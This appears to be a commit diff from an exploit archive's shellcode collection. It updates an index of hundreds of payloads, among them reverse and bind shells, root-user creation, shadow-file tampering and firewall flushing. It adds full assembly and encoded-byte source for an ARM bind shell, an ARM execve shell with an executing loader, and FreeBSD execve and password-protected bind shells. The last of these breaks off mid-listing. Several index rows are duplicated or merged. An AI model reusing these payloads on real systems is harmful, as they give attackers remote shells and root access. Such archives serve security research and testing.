41467,shellcodes/win_x86/41467.c,"Windows x86 - Executable Directory Search Null-Free Shellcode (130 bytes)",2017-02-26,lu0xheap,shellcode,win_x86
41468,shellcodes/lin_x86-64/41468.nasm,"Linux/x86-64 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",shellcode,lin_x86-64
41477,shellcodes/lin_x86-64/41477.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.45:4444/TCP) Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",shellcode,lin_x86-64
41481,shellcodes/win_x86/41481.asm,"Windows x86 - Reverse TCP Staged Alphanumeric Shell (127.0.0.1:4444/TCP) Shellcode (332 Bytes)",2017-03-01,"Snir Levi",shellcode,win_x86
41481,shellcodes/win_x86/41481.asm,"Windows x86 - Reverse TCP Staged Alphanumeric Shell (127.0.0.1:4444/TCP) Shellcode (332 bytes)",2017-03-01,"Snir Levi",shellcode,win_x86
41498,shellcodes/lin_x86-64/41498.nasm,"Linux/x86-64 - setuid(0) + execve(/bin/sh) Polymorphic Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",shellcode,lin_x86-64
41503,shellcodes/lin_x86-64/41503.nasm,"Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Polymorphic Shellcode (47 bytes)",2017-03-03,"Robert L. Taylor",shellcode,lin_x86-64
41509,shellcodes/lin_x86-64/41509.nasm,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1337) Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",shellcode,lin_x86-64
@ -628,12 +628,25 @@ id,file,description,date,author,type,platform
43482,shellcodes/alpha/43482.c,"Alpha - setuid() Shellcode (156 bytes)",2009-01-01,anonymous,shellcode,alpha
43483,shellcodes/bsd_x86/43483.c,"BSD/x86 - setreuid(geteuid()_ geteuid()) + execve(_/bin/sh_) Shellcode (36 bytes)",2009-01-01,"Jihyeog Lim",shellcode,bsd_x86
43489,shellcodes/lin_x86/43489.c,"Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (53 bytes)",2018-01-10,"Debashis Pal",shellcode,lin_x86
41630,shellcodes/lin_x86/41630.asm,"Linux/x86 - exceve /bin/sh Encoded Shellcode (44 Bytes)",2017-03-17,WangYihang,shellcode,lin_x86
43497,shellcodes/arm/43497.asm,"Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (0.0.0.0:4444/TCP) Null-Free Shellcode (112 bytes)",2018-01-11,Azeria,shellcode,arm
43502,shellcodes/freebsd_x86-64/43502.txt,"FreeBSD/x86-64 - execve /bin/sh Shellcode (28 bytes)",2009-01-01,Gitsnik,shellcode,freebsd_x86-64
43503,shellcodes/freebsd_x86-64/43503.txt,"FreeBSD/x86-64 - Bind TCP Password (R2CBw0cr) /bin/sh Shell Shellcode (127 bytes)",2009-01-11,Gitsnik,shellcode,freebsd_x86-64
43504,shellcodes/freebsd_x86/43504.asm,"FreeBSD/x86 - execv(/bin/sh) Shellcode (23 bytes)",2009-01-01,Tosh,shellcode,freebsd_x86
43505,shellcodes/freebsd_x86/43505.c,"FreeBSD/x86 - //sbin/pfctl -F all Shellcode (47 bytes)",2009-01-01,antrhacks,shellcode,freebsd_x86
43506,shellcodes/freebsd_x86/43506.c,"FreeBSD/x86 - Bind TCP /bin/sh Shell (41254/TCP) Shellcode (115 bytes)",2009-01-01,zillion,shellcode,freebsd_x86
43507,shellcodes/freebsd_x86/43507.c,"FreeBSD - reboot() Shellcode (15 Bytes)",2009-01-01,zillion,shellcode,freebsd_x86
43508,shellcodes/irix/43508.c,"IRIX - execve(/bin/sh -c) Shellcode (72 bytes)",2009-01-01,anonymous,shellcode,irix
43509,shellcodes/irix/43509.c,"IRIX - execve(/bin/sh) Shellcode (43 bytes)",2009-01-01,anonymous,shellcode,irix
43510,shellcodes/irix/43510.c,"IRIX - Bind TCP /bin/sh Shell Shellcode (364 bytes)",2009-01-01,scut/teso,shellcode,irix
43511,shellcodes/irix/43511.c,"IRIX - execve(/bin/sh) Shellcode (68 bytes)",2009-01-01,scut/teso,shellcode,irix
43512,shellcodes/irix/43512.c,"IRIX - stdin-read Shellcode (40 bytes)",2009-01-01,scut/teso,shellcode,irix
43520,shellcodes/arm/43520.c,"Linux/ARM - execve(_/bin/sh__ NULL_ 0) Shellcode (34 bytes)",2017-03-31,dummys,shellcode,arm
41630,shellcodes/lin_x86/41630.asm,"Linux/x86 - exceve /bin/sh Encoded Shellcode (44 bytes)",2017-03-17,WangYihang,shellcode,lin_x86
41631,shellcodes/lin_x86/41631.c,"Linux/x86 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",shellcode,lin_x86
41635,shellcodes/lin_x86/41635.txt,"Linux/x86 - Read /etc/passwd Shellcode (54 Bytes)",2017-03-19,WangYihang,shellcode,lin_x86
41635,shellcodes/lin_x86/41635.txt,"Linux/x86 - Read /etc/passwd Shellcode (54 bytes)",2017-03-19,WangYihang,shellcode,lin_x86
42295,shellcodes/lin_x86/42295.c,"Linux/x86 - Reverse TCP Shell (127.1.1.1:11111/TCP) Null-Free Shellcode (67 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,lin_x86
41723,shellcodes/lin_x86/41723.c,"Linux/x86 - Reverse TCP /bin/bash Shell (192.168.3.119:54321/TCP) Shellcode (110 bytes)",2017-03-24,JR0ch17,shellcode,lin_x86
41750,shellcodes/lin_x86-64/41750.txt,"Linux/x86-64 - execve /bin/sh Shellcode (21 Bytes)",2017-03-28,WangYihang,shellcode,lin_x86-64
41750,shellcodes/lin_x86-64/41750.txt,"Linux/x86-64 - execve /bin/sh Shellcode (21 bytes)",2017-03-28,WangYihang,shellcode,lin_x86-64
41757,shellcodes/lin_x86/41757.txt,"Linux/x86 - execve /bin/sh Shellcode (21 bytes)",2017-03-29,WangYihang,shellcode,lin_x86
41827,shellcodes/win_x86-64/41827.txt,"Windows 10 x64 - Egghunter Shellcode (45 bytes)",2017-04-06,"Peter Baris",shellcode,win_x86-64
41883,shellcodes/lin_x86-64/41883.txt,"Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (2)",2017-04-13,WangYihang,shellcode,lin_x86-64

1 id file description date author type platform
14 13252 shellcodes/bsd_x86/13252.c BSD/x86 - execve /bin/sh Encoded Shellcode (57 bytes) 2004-09-26 Matias Sedalo shellcode bsd_x86
15 13254 shellcodes/bsd_x86/13254.c BSD/x86 - Reverse TCP Shell (torootteam.host.sk:2222/TCP) Shellcode (93 bytes) 2004-09-26 dev0id shellcode bsd_x86
16 13255 shellcodes/bsd_x86/13255.c BSD/x86 - execve(/bin/cat /etc/master.passwd) | mail root@localhost Shellcode (92 bytes) 2004-09-26 Matias Sedalo shellcode bsd_x86
17 13256 shellcodes/freebsd_x86/13256.c shellcodes/bsd/13256.c FreeBSD/x86 - Reverse TCP Shell (192.168.1.69:6969/TCP) Shellcode (129 bytes) BSD/x86 - Reverse TCP Shell (192.168.2.33:6969/TCP) Shellcode (129 bytes) 2004-09-26 Sinan Eren shellcode freebsd_x86 bsd
18 13257 shellcodes/bsdi_x86/13257.txt BSDi/x86 - execve /bin/sh Shellcode (45 bytes) 2004-09-26 duke shellcode bsdi_x86
19 13258 shellcodes/bsdi_x86/13258.txt BSDi/x86 - execve /bin/sh Shellcode (46 bytes) 2004-09-26 vade79 shellcode bsdi_x86
20 13260 shellcodes/bsdi_x86/13260.c BSDi/x86 - execve /bin/sh ToUpper Encoded Shellcode (97 bytes) 2004-09-26 anonymous shellcode bsdi_x86
27 13267 shellcodes/freebsd_x86/13267.asm FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:8000/TCP) Null-Free Shellcode (89 bytes) 2008-08-21 sm4x shellcode freebsd_x86
28 13268 shellcodes/freebsd_x86/13268.asm FreeBSD/x86 - setuid(0); + execve(ipf -Fa); Shellcode (57 bytes) 2008-08-21 sm4x shellcode freebsd_x86
29 13269 shellcodes/freebsd_x86/13269.c FreeBSD/x86 - execve /bin/sh Encoded Shellcode (48 bytes) 2008-08-19 c0d3_z3r0 shellcode freebsd_x86
30 13270 shellcodes/freebsd_x86/13270.c FreeBSD/x86 - Bind TCP Password Shell (4883/TCP) Shellcode (222 bytes) FreeBSD/x86 - Bind TCP Password /bin/sh Shell (4883/TCP) Shellcode (222 bytes) 2006-07-19 MahDelin shellcode freebsd_x86
31 13271 shellcodes/freebsd_x86/13271.c FreeBSD/x86 - reboot(RB_AUTOBOOT) Shellcode (7 bytes) 2006-04-19 IZ shellcode freebsd_x86
32 13272 shellcodes/freebsd_x86/13272.c FreeBSD/x86 - execve /bin/sh Shellcode (23 bytes) (1) 2006-04-14 IZ shellcode freebsd_x86
33 13273 shellcodes/freebsd_x86/13273.c FreeBSD/x86 - execve /bin/sh Shellcode (23 bytes) (2) 2004-09-26 marcetam shellcode freebsd_x86
47 13288 shellcodes/generator/13288.c (Generator) - HTTP/1.x Requests Shellcode (18+/26+ bytes) 2006-10-22 izik shellcode generator
48 13289 shellcodes/generator/13289.c Windows x86 - Multi-Format Encoding Tool Shellcode (Generator) 2005-12-16 Skylined shellcode generator
49 13290 shellcodes/ios/13290.txt iOS Version-independent - Null-Free Shellcode 2008-08-21 Andy Davis shellcode ios
50 13291 shellcodes/hardware/13291.txt Cisco IOS - New TTY / Privilege Level To 15 / Reverse Virtual Terminal Shell (21/TCP) Shellcode Cisco IOS - New TTY + Privilege Level To 15 + Reverse Virtual Terminal Shell (21/TCP) Shellcode 2008-08-13 Gyan Chawdhary shellcode hardware
51 13292 shellcodes/hardware/13292.txt Cisco IOS/PowerPC - New VTY + Password (1rmp455) Shellcode (116 bytes) 2008-08-13 Gyan Chawdhary Varun Uppal shellcode hardware
52 13293 shellcodes/hardware/13293.txt Cisco IOS - New TTY / Privilege Level To 15 / No Password Shellcode Cisco IOS - New TTY + Privilege Level To 15 + No Password Shellcode 2008-08-13 Gyan Chawdhary shellcode hardware
53 13295 shellcodes/hp-ux/13295.txt HPUX - execve /bin/sh Shellcode (58 bytes) HP-UX - execve /bin/sh Shellcode (58 bytes) 2004-09-26 K2 shellcode hp-ux
54 13296 shellcodes/lin_x86-64/13296.c Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (84 bytes) 2008-11-28 gat3way shellcode lin_x86-64
55 13297 shellcodes/generator/13297.c Linux/x86-64 - Reverse TCP Semi-Stealth /bin/bash Shell Shellcode (88+ bytes) (Generator) 2006-04-21 phar shellcode generator
56 13298 shellcodes/linux_mips/13298.c Linux/MIPS (Linksys WRT54G/GL) - Bind TCP /bin/sh Shell (4919/TCP) Shellcode (276 bytes) 2008-08-18 vaicebine shellcode linux_mips
229 13472 shellcodes/netbsd_x86/13472.c NetBSD/x86 - setreuid(0_ 0); + execve(_/bin//sh__ ..._ NULL); Shellcode (29 bytes) 2005-11-30 p. minervini shellcode netbsd_x86
230 13473 shellcodes/netbsd_x86/13473.c NetBSD/x86 - setreuid(0_ 0); + execve(_/bin//sh__ ..._ NULL); Shellcode (30 bytes) 2005-11-30 p. minervini shellcode netbsd_x86
231 13474 shellcodes/netbsd_x86/13474.txt NetBSD/x86 - execve /bin/sh Shellcode (68 bytes) 2004-09-26 humble shellcode netbsd_x86
232 13475 shellcodes/openbsd_x86/13475.c OpenBSD/x86 - execve /bin/sh Shellcode (23 Bytes) OpenBSD/x86 - execve /bin/sh Shellcode (23 bytes) 2006-05-01 hophet shellcode openbsd_x86
233 13476 shellcodes/openbsd_x86/13476.c OpenBSD/x86 - Bind TCP Shell (6969/TCP) Shellcode (148 bytes) 2004-09-26 Sinan Eren shellcode openbsd_x86
234 13477 shellcodes/openbsd_x86/13477.c OpenBSD/x86 - Add Root User (w00w00) Shellcode (112 bytes) 2004-09-26 anonymous shellcode openbsd_x86
235 13478 shellcodes/osx_ppc/13478.c OSX/PPC - sync() + reboot() Shellcode (32 bytes) 2006-05-01 hophet shellcode osx_ppc
407 15136 shellcodes/windows/15136.cpp Windows Mobile 6.5 TR - Phone Call Shellcode 2010-09-27 Celil Ünüver shellcode windows
408 15202 shellcodes/win_x86/15202.c Windows XP Professional SP3 x86 (English) - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes) 2010-10-04 Anastasios Monachos shellcode win_x86
409 15203 shellcodes/win_x86/15203.c Windows x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes) 2010-10-04 Anastasios Monachos shellcode win_x86
410 15314 shellcodes/arm/15314.asm ARM - Bind TCP Shell (0x1337/TCP) Shellcode Linux/ARM - Bind TCP Shell (0x1337/TCP) Shellcode 2010-10-26 Daniel Godas-Lopez shellcode arm
411 15315 shellcodes/arm/15315.asm ARM - Bind TCP Listener (68/UDP) + Reverse TCP Shell (192.168.0.1:67/TCP) Shellcode Linux/ARM - Bind TCP Listener (68/UDP) + Reverse TCP Shell (192.168.0.1:67/TCP) Shellcode 2010-10-26 Daniel Godas-Lopez shellcode arm
412 15316 shellcodes/arm/15316.asm ARM - Bind TCP Listener (0x1337/TCP) + Receive Shellcode + Payload Loader Shellcode Linux/ARM - Bind TCP Listener (0x1337/TCP) + Receive Shellcode + Payload Loader Shellcode 2010-10-26 Daniel Godas-Lopez shellcode arm
413 15317 shellcodes/arm/15317.asm ARM - ifconfig eth0 192.168.0.2 up Shellcode Linux/ARM - ifconfig eth0 192.168.0.2 up Shellcode 2010-10-26 Daniel Godas-Lopez shellcode arm
414 15616 shellcodes/arm/15616.c Linux/ARM - Add Root User (shell-storm/toor) Shellcode (151 bytes) 2010-11-25 Jonathan Salwan shellcode arm
415 15618 shellcodes/osx/15618.c OSX/Intel x86-64 - setuid shell Shellcode (51 bytes) 2010-11-25 Dustin Schultz shellcode osx
416 15712 shellcodes/generator/15712.rb ARM - Add Root User Shellcode (Metasploit) (66+ bytes) (Generator) 2010-12-09 Jonathan Salwan shellcode generator
417 15879 shellcodes/win_x86/15879.txt Windows 5.0 < 7.0 x86 - Speaking 'You got pwned!' Null-Free Shellcode 2010-12-31 Skylined shellcode win_x86
418 16025 shellcodes/generator/16025.c FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:1337/TCP) Shellcode (81 bytes) (Generator) 2011-01-21 Tosh shellcode generator
419 16026 shellcodes/freebsd_x86/16026.c FreeBSD/x86 - Bind TCP Shell (31337/TCP) + Fork Shellcode (111 bytes) FreeBSD/x86 - Bind TCP /bin/sh Shell (31337/TCP) + Fork Shellcode (111 bytes) 2011-01-21 Tosh shellcode freebsd_x86
420 16283 shellcodes/win_x86/16283.txt Windows x86 - Eggsearch Shellcode (33 bytes) 2011-03-05 oxff shellcode win_x86
421 17432 shellcodes/sh4/17432.c Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes) 2011-06-22 Jonathan Salwan shellcode sh4
422 17194 shellcodes/lin_x86/17194.txt Linux/x86 - Bind Netcat (/usr/bin/netcat) /bin/sh Shell (6666/TCP) + Polymorphic XOR Encoded Shellcode (69/93 bytes) 2011-04-21 Jonathan Salwan shellcode lin_x86
456 27180 shellcodes/arm/27180.asm Windows RT ARM - Bind TCP Shell (4444/TCP) Shellcode 2013-07-28 Matthew Graeber shellcode arm
457 40827 shellcodes/lin_x86/40827.c Linux/x86 - Egghunter Shellcode (31 bytes) 2016-11-25 Filippo Bersani shellcode lin_x86
458 28474 shellcodes/lin_x86/28474.c Linux/x86 - Egg Omelet (Multi-Egghunter) + Reverse TCP /bin/sh Shell (192.168.122.1:43981/TCP) Shellcode 2013-09-23 Ryan Fenno shellcode lin_x86
459 40334 shellcodes/win_x86/40334.c Windows x86 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Persistent Access Shellcode (494 Bytes) Windows x86 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Persistent Access Shellcode (494 bytes) 2016-09-05 Roziul Hasan Khan Shifat shellcode win_x86
460 28996 shellcodes/windows/28996.c Windows - MessageBox Null-Free Shellcode (113 bytes) 2013-10-16 Giuseppe D'Amore shellcode windows
461 29436 shellcodes/linux_mips/29436.asm Linux/MIPS (Little Endian) - Reverse TCP /bin/sh Shell (192.168.1.177:31337/TCP) Shellcode (200 bytes) 2013-11-04 Jacob Holcomb shellcode linux_mips
462 40352 shellcodes/win_x86/40352.c Windows 7 x86 - Bind TCP Shell (4444/TCP) Shellcode (357 Bytes) Windows 7 x86 - Bind TCP Shell (4444/TCP) Shellcode (357 bytes) 2016-09-08 Roziul Hasan Khan Shifat shellcode win_x86
463 33836 shellcodes/windows/33836.txt Windows - Add Administrator User (BroK3n/BroK3n) Null-Free Shellcode (194 bytes) 2014-06-22 Giuseppe D'Amore shellcode windows
464 34060 shellcodes/lin_x86/34060.c Linux/x86 - execve /bin/sh + Socket Re-Use Shellcode (50 bytes) 2014-07-14 ZadYree shellcode lin_x86
465 34262 shellcodes/lin_x86/34262.c Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + Execute /bin/sh Shellcode (378 bytes) 2014-08-04 Ali Razmjoo shellcode lin_x86
615 41467 shellcodes/win_x86/41467.c Windows x86 - Executable Directory Search Null-Free Shellcode (130 bytes) 2017-02-26 lu0xheap shellcode win_x86
616 41468 shellcodes/lin_x86-64/41468.nasm Linux/x86-64 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (54 bytes) 2017-02-26 Robert L. Taylor shellcode lin_x86-64
617 41477 shellcodes/lin_x86-64/41477.c Linux/x86-64 - Reverse TCP Shell (192.168.1.45:4444/TCP) Shellcode (84 bytes) 2017-02-28 Manuel Mancera shellcode lin_x86-64
618 41481 shellcodes/win_x86/41481.asm Windows x86 - Reverse TCP Staged Alphanumeric Shell (127.0.0.1:4444/TCP) Shellcode (332 Bytes) Windows x86 - Reverse TCP Staged Alphanumeric Shell (127.0.0.1:4444/TCP) Shellcode (332 bytes) 2017-03-01 Snir Levi shellcode win_x86
619 41498 shellcodes/lin_x86-64/41498.nasm Linux/x86-64 - setuid(0) + execve(/bin/sh) Polymorphic Shellcode (31 bytes) 2017-03-03 Robert L. Taylor shellcode lin_x86-64
620 41503 shellcodes/lin_x86-64/41503.nasm Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Polymorphic Shellcode (47 bytes) 2017-03-03 Robert L. Taylor shellcode lin_x86-64
621 41509 shellcodes/lin_x86-64/41509.nasm Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1337) Shellcode (72 bytes) 2017-03-04 Robert L. Taylor shellcode lin_x86-64
628 43482 shellcodes/alpha/43482.c Alpha - setuid() Shellcode (156 bytes) 2009-01-01 anonymous shellcode alpha
629 43483 shellcodes/bsd_x86/43483.c BSD/x86 - setreuid(geteuid()_ geteuid()) + execve(_/bin/sh_) Shellcode (36 bytes) 2009-01-01 Jihyeog Lim shellcode bsd_x86
630 43489 shellcodes/lin_x86/43489.c Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (53 bytes) 2018-01-10 Debashis Pal shellcode lin_x86
631 41630 43497 shellcodes/lin_x86/41630.asm shellcodes/arm/43497.asm Linux/x86 - exceve /bin/sh Encoded Shellcode (44 Bytes) Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (0.0.0.0:4444/TCP) Null-Free Shellcode (112 bytes) 2017-03-17 2018-01-11 WangYihang Azeria shellcode lin_x86 arm
632 43502 shellcodes/freebsd_x86-64/43502.txt FreeBSD/x86-64 - execve /bin/sh Shellcode (28 bytes) 2009-01-01 Gitsnik shellcode freebsd_x86-64
633 43503 shellcodes/freebsd_x86-64/43503.txt FreeBSD/x86-64 - Bind TCP Password (R2CBw0cr) /bin/sh Shell Shellcode (127 bytes) 2009-01-11 Gitsnik shellcode freebsd_x86-64
634 43504 shellcodes/freebsd_x86/43504.asm FreeBSD/x86 - execv(/bin/sh) Shellcode (23 bytes) 2009-01-01 Tosh shellcode freebsd_x86
635 43505 shellcodes/freebsd_x86/43505.c FreeBSD/x86 - //sbin/pfctl -F all Shellcode (47 bytes) 2009-01-01 antrhacks shellcode freebsd_x86
636 43506 shellcodes/freebsd_x86/43506.c FreeBSD/x86 - Bind TCP /bin/sh Shell (41254/TCP) Shellcode (115 bytes) 2009-01-01 zillion shellcode freebsd_x86
637 43507 shellcodes/freebsd_x86/43507.c FreeBSD - reboot() Shellcode (15 Bytes) 2009-01-01 zillion shellcode freebsd_x86
638 43508 shellcodes/irix/43508.c IRIX - execve(/bin/sh -c) Shellcode (72 bytes) 2009-01-01 anonymous shellcode irix
639 43509 shellcodes/irix/43509.c IRIX - execve(/bin/sh) Shellcode (43 bytes) 2009-01-01 anonymous shellcode irix
640 43510 shellcodes/irix/43510.c IRIX - Bind TCP /bin/sh Shell Shellcode (364 bytes) 2009-01-01 scut/teso shellcode irix
641 43511 shellcodes/irix/43511.c IRIX - execve(/bin/sh) Shellcode (68 bytes) 2009-01-01 scut/teso shellcode irix
642 43512 shellcodes/irix/43512.c IRIX - stdin-read Shellcode (40 bytes) 2009-01-01 scut/teso shellcode irix
643 43520 shellcodes/arm/43520.c Linux/ARM - execve(_/bin/sh__ NULL_ 0) Shellcode (34 bytes) 2017-03-31 dummys shellcode arm
644 41630 shellcodes/lin_x86/41630.asm Linux/x86 - exceve /bin/sh Encoded Shellcode (44 bytes) 2017-03-17 WangYihang shellcode lin_x86
645 41631 shellcodes/lin_x86/41631.c Linux/x86 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (44 bytes) 2017-03-17 Oleg Boytsev shellcode lin_x86
646 41635 shellcodes/lin_x86/41635.txt Linux/x86 - Read /etc/passwd Shellcode (54 Bytes) Linux/x86 - Read /etc/passwd Shellcode (54 bytes) 2017-03-19 WangYihang shellcode lin_x86
647 42295 shellcodes/lin_x86/42295.c Linux/x86 - Reverse TCP Shell (127.1.1.1:11111/TCP) Null-Free Shellcode (67 bytes) 2013-01-01 Geyslan G. Bem shellcode lin_x86
648 41723 shellcodes/lin_x86/41723.c Linux/x86 - Reverse TCP /bin/bash Shell (192.168.3.119:54321/TCP) Shellcode (110 bytes) 2017-03-24 JR0ch17 shellcode lin_x86
649 41750 shellcodes/lin_x86-64/41750.txt Linux/x86-64 - execve /bin/sh Shellcode (21 Bytes) Linux/x86-64 - execve /bin/sh Shellcode (21 bytes) 2017-03-28 WangYihang shellcode lin_x86-64
650 41757 shellcodes/lin_x86/41757.txt Linux/x86 - execve /bin/sh Shellcode (21 bytes) 2017-03-29 WangYihang shellcode lin_x86
651 41827 shellcodes/win_x86-64/41827.txt Windows 10 x64 - Egghunter Shellcode (45 bytes) 2017-04-06 Peter Baris shellcode win_x86-64
652 41883 shellcodes/lin_x86-64/41883.txt Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (2) 2017-04-13 WangYihang shellcode lin_x86-64

76
shellcodes/arm/43497.asm Normal file
View file

@ -0,0 +1,76 @@
.section .text
.global _start
_start:
.ARM
add r3, pc, #1 // switch to thumb mode
bx r3
.THUMB
// socket(2, 1, 0)
mov r0, #2
mov r1, #1
sub r2, r2, r2 // set r2 to null
mov r7, #200 // r7 = 281 (socket)
add r7, #81 // r7 value needs to be split
svc #1 // r0 = host_sockid value
mov r4, r0 // save host_sockid in r4
// bind(r0, &sockaddr, 16)
adr r1, struct_addr // pointer to address, port
strb r2, [r1, #1] // write 0 for AF_INET
strb r2, [r1, #4] // replace 1 with 0 in x.1.1.1
strb r2, [r1, #5] // replace 1 with 0 in 0.x.1.1
strb r2, [r1, #6] // replace 1 with 0 in 0.0.x.1
strb r2, [r1, #7] // replace 1 with 0 in 0.0.0.x
mov r2, #16 // struct address length
add r7, #1 // r7 = 282 (bind)
svc #1
nop
// listen(sockfd, 0)
mov r0, r4 // set r0 to saved host_sockid
mov r1, #2
add r7, #2 // r7 = 284 (listen syscall number)
svc #1
// accept(sockfd, NULL, NULL);
mov r0, r4 // set r0 to saved host_sockid
sub r1, r1, r1 // set r1 to null
sub r2, r2, r2 // set r2 to null
add r7, #1 // r7 = 284+1 = 285 (accept syscall)
svc #1 // r0 = client_sockid value
mov r4, r0 // save new client_sockid value to r4
// dup2(sockfd, 0)
mov r7, #63 // r7 = 63 (dup2 syscall number)
mov r0, r4 // r4 is the saved client_sockid
sub r1, r1, r1 // r1 = 0 (stdin)
svc #1
// dup2(sockfd, 1)
mov r0, r4 // r4 is the saved client_sockid
add r1, #1 // r1 = 1 (stdout)
svc #1
// dup2(sockfd, 2)
mov r0, r4 // r4 is the saved client_sockid
add r1, #1 // r1 = 2 (stderr)
svc #1
// execve("/bin/sh", 0, 0)
adr r0, shellcode // r0 = location of "/bin/shX"
eor r1, r1, r1 // clear register r1. R1 = 0
eor r2, r2, r2 // clear register r2. r2 = 0
strb r2, [r0, #7] // store null-byte for AF_INET
mov r7, #11 // execve syscall number
svc #1
nop
struct_addr:
.ascii "\x02\xff" // AF_INET 0xff will be NULLed
.ascii "\x11\x5c" // port number 4444
.byte 1,1,1,1 // IP Address
shellcode:
.ascii "/bin/shX"
// \x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\x20\x01\x21\x92\x1a\xc8\x27\x51\x37\x01\xdf\x04\x1c\x12\xa1\x4a\x70\x0a\x71\x4a\x71\x8a\x71\xca\x71\x10\x22\x01\x37\x01\xdf\xc0\x46\x20\x1c\x02\x21\x02\x37\x01\xdf\x20\x1c\x49\x1a\x92\x1a\x01\x37\x01\xdf\x04\x1c\x3f\x27\x20\x1c\x49\x1a\x01\xdf\x20\x1c\x01\x31\x01\xdf\x20\x1c\x01\x31\x01\xdf\x05\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\xc0\x46\x02\xff\x11\x5c\x01\x01\x01\x01\x2f\x62\x69\x6e\x2f\x73\x68\x58

61
shellcodes/arm/43520.c Normal file
View file

@ -0,0 +1,61 @@
/*
Title: Linux/ARM - execve("/bin/sh", NULL, 0) - 34 bytes
Date: 2017-03-31
Tested: armv7l
Author: Jonathan 'dummys' Borgeaud - twitter: @dummys1337
fapperz.org
Shellcode ARM without 0x20, 0x0a and 0x00
assembly shellcode: as -o sc.o sc.s
.syntax unified
.global main
.code 32
main:
add r3, pc, #1 /* add 0x1 to pc to prepare the switch to thumb mode */
bx r3 /* switch to thumb mode */
.thumb
mov r0, pc /* move pc to r0 */
adds r0, #14 /* make r0 to point to /bin//sh */
str r0, [sp, #4] /* store /bin//sh to the stack */
subs r1, r1, r1 /* put 0 in r1 */
subs r2, r2, r2 /* put 0 in r2 */
movs r7, #8 /* move 8 in r7 */
str r2, [r0, r7] /* store nullbytes at the end of /bin//sh */
adds r7, #3 /* add 3 to r7 for execve syscall */
svc 1 /* call execve */
str r7, [r5, #32] /* thumb instruction for "/b" string */
ldr r1, [r5, #100] /* thumb instruction for "in" string */
cmp r7, #0x2f /* thumb instruction for "//" string */
ldr r3, [r6, #4] /* thumb instruction for "sh" string */
compiler c: gcc -marm -fno-stack-protector -z execstack -o loader loader.c
*/
#include <stdio.h>
#include <string.h>
char *SC = "\x01\x30\x8f\xe2"
"\x13\xff\x2f\xe1"
"\x78\x46\x0e\x30"
"\x01\x90\x49\x1a"
"\x92\x1a\x08\x27"
"\xc2\x51\x03\x37"
"\x01\xdf\x2f\x62"
"\x69\x6e\x2f\x2f"
"\x73\x68";
int main(void)
{
char payload[34];
memcpy(payload, SC, 34);
fprintf(stdout, "Length: %d\n", strlen(SC));
(*(void(*)()) payload) ();
return 0;
}

0
shellcodes/freebsd_x86/13256.c → shellcodes/bsd/13256.c
View file

52
shellcodes/freebsd_x86-64/43502.txt Normal file
View file

@ -0,0 +1,52 @@
/*
* Gitsnik, @dracyrys
* FreeBSD x86_64 execve, 28 bytes
*
*/
C source:
char code[] = \
"\x48\x31\xc9\x48\xf7\xe1\x04\x3b\x48\xbb"
"\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x52\x53"
"\x54\x5f\x52\x57\x54\x5e\x0f\x05";
Intel Assembly:
global _start
;
; 28 byte execve FreeBSD x86_64
;
; [gitsnik@bsd64]$ nasm -f elf64 shell.nasm -o shell.o
; [gitsnik@bsd64]$ ld -o shell shell.o
; [gitsnik@bsd64]$ ./shell
; $ exit
; [gitsnik@bsd64]$
;
section .text
_start:
xor rcx, rcx
mul rcx
add al, 0x3b ; execve()
mov rbx, 0x68732f2f6e69622f ; hs//nib/
; Argument one shell[0] = "/bin//sh"
push rdx ; null
push rbx ; hs//nib/
; We need pointers for execve()
push rsp ; *pointer to shell[0]
pop rdi ; Argument 1
; Argument two shell (including address of each argument in array)
push rdx ; null
push rdi ; address of shell[0]
; We need pointers for execve()
push rsp ; address of char * shell
pop rsi ; Argument 2
syscall

216
shellcodes/freebsd_x86-64/43503.txt Normal file
View file

@ -0,0 +1,216 @@
/*
* Gitsnik, @dracyrys
* FreeBSD x86_64 bind_tcp with passcode, 127 bytes
* Passcode: R2CBw0cr
*/
C Source:
char code[] = \
"\x6a\x61\x58\x6a\x02\x5f\x6a\x01\x5e\x99"
"\x0f\x05\x48\x97\xba\xff\x02\xaa\xaa\x80"
"\xf2\xff\x52\x48\x89\xe6\x99\x04\x66\x80"
"\xc2\x10\x0f\x05\x04\x6a\x0f\x05\x04\x1e"
"\x48\x31\xf6\x99\x0f\x05\x48\x97\x6a\x03"
"\x58\x52\x48\x8d\x74\x24\xf0\x80\xc2\x10"
"\x0f\x05\x48\xb8\x52\x32\x43\x42\x77\x30"
"\x63\x72\x57\x48\x8d\x3e\x48\xaf\x74\x08"
"\x48\x31\xc0\x48\xff\xc0\x0f\x05\x5f\x48"
"\x89\xd0\x48\x89\xfe\x48\xff\xce\xb0\x5a"
"\x0f\x05\x75\xf7\x99\x04\x3b\x48\xbb\x2f"
